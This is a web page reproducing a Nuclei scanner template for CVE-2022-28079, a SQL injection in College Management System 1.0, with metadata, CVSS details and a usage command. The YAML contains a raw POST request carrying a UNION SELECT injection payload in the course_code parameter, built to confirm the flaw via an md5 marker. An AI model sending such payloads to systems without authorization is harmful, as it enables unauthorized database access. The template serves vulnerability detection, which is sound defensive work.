Skip to content
Nuclei Templates

College Management System 1.0 - SQL Injection

ID: CVE-2022-28079

Severity: high

Author: ritikchaddha

Tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project

Description

Section titled “Description”

College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2022-28079


info:
  name: College Management System 1.0 - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated
    - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28079
    - https://code-projects.org/college-management-system-in-php-with-source-code/
    - https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-28079
    cwe-id: CWE-89
    epss-score: 0.68173
    epss-percentile: 0.97965
    cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: college_management_system_project
    product: college_management_system
  tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project
variables:
  num: "999999999"


http:
  - raw:
      - |
        POST /admin/asign-single-student-subjects.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'


      - type: status
        status:
          - 302
# digest: 4a0a00473045022100a916e4625ba1a09971bca9c80579651df65fc995c47d1a55211359dee95583f5022001a372d07c338d2d327596673670e370f18455e9c5103ff66c24dadade11dff1:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-28079.yaml"

View on Github